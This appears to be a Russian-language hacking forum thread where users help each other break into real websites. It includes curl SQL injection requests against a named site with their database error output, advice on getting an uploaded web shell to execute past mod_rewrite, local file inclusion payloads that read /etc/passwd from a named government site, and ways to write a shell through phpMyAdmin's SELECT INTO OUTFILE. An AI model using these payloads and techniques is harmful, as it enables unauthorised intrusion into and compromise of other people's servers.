была там скуль, натравили наверно стопитцот sqlmap'ов -_- , всё уже закрыли децл лога осталось, не обычная кстати скуль была.... Code: curl 'https://mixdrop.ru/?ref=100/*fff*/' Syntax error, unexpected token *, near to 'fff*/ AND ip = '*.*.*.*' LIMIT :APL0:', when parsing: SELECT [Ref].* FROM [Ref] WHERE user_id = 100/*fff*/ AND ip = '*.*.*.*' LIMIT :APL0: (90)<br><pre>#0 [internal function]: Phalcon\Mvc\Model\Query->parse() #1 [internal function]: Phalcon\Mvc\Model\Query->execute() #2 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 100/*...') #3 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 100/*...') #4 [internal function]: GamesController->indexAction() #5 [internal function]: Phalcon\Dispatcher->dispatch() #6 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle() #7 {main}</pre> curl 'https://mixdrop.ru/?ref=90+or+user_id=a()' SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION mixdrop.ru.a does not exist<br><pre>#0 [internal function]: PDOStatement->execute() #1 [internal function]: Phalcon\Db\Adapter\Pdo->executePrepared(Object(PDOStatement), Array, Array) #2 [internal function]: Phalcon\Db\Adapter\Pdo->query('SELECT `ref`.`i...', Array, Array) #3 [internal function]: Phalcon\Mvc\Model\Query->_executeSelect(Array, Array, Array) #4 [internal function]: Phalcon\Mvc\Model\Query->execute() #5 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 90 o...') #6 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 90 o...') #7 [internal function]: GamesController->indexAction() #8 [internal function]: Phalcon\Dispatcher->dispatch() #9 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle() #10 {main}</pre>
очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно сорцы если что https://github.com/jakehu/phpinfo-by-yahei/blob/master/tz.php
Я тоже н не нашёл, ну я там особо не глядел, там есть коннект к БД. И Возможно, скорее всего залиться через него варианта не будет. Это как бы техничиский монитор
Закинул я шелл в upload : site.com/upload/shell Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html Сервер шелл не хочет открывать - такого файла у него нет . Я пробую добавить null byte после имени файла в браузере и теперь имя корректно. Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает . Можно ли как-то победить rewrite или мертвый номер ?
залить свой .htaccess в котором вырубить все модреврайты к чертям, или хедлер html->php добавить в .htaccess, ну это если есть возможность свой .htaccess загрузить
Увы но htaccess никак не войдет . Остается или победить rewrite , или искать локальных инклудов . Хотя похоже их тоже негусто .
хм как же сайт работает, то есть если на сайте динамические элементы есть, формы там всякие, то php как то прикручен надо глянуть в сорцы страницы с какой нить формой, что там? <form action=".... -------------- может там что то типа AddType application/x-httpd-php .html .htm настроено) пробовал шелл с расширением .html загрузить?
Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin. http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00 http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00 В последнем случае нет вывода (
1) PHP: http://www.mogalakwena.gov.za/index.php?page=php://filter/convert.base64-encode/resource=index 2) инклудить сессию 3) PHP: http://www.mogalakwena.gov.za/index.php?page=http://www.mogalakwena.gov.za/index.php?page=demographics%00 что ещё можно придумать ?
Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) " Подскажите что можно еще придумать?
Значит, скорее всего, в другие папки писать не получится, даже если есть права на запись, потому что так настроен мускуль (но попробовать стоит). Можно попытаться найти lfi и использовать в паре с этой багой.
нельзя писать в директорию, но как вариант можно попробовать запись в существующий файл, вдруг права другие
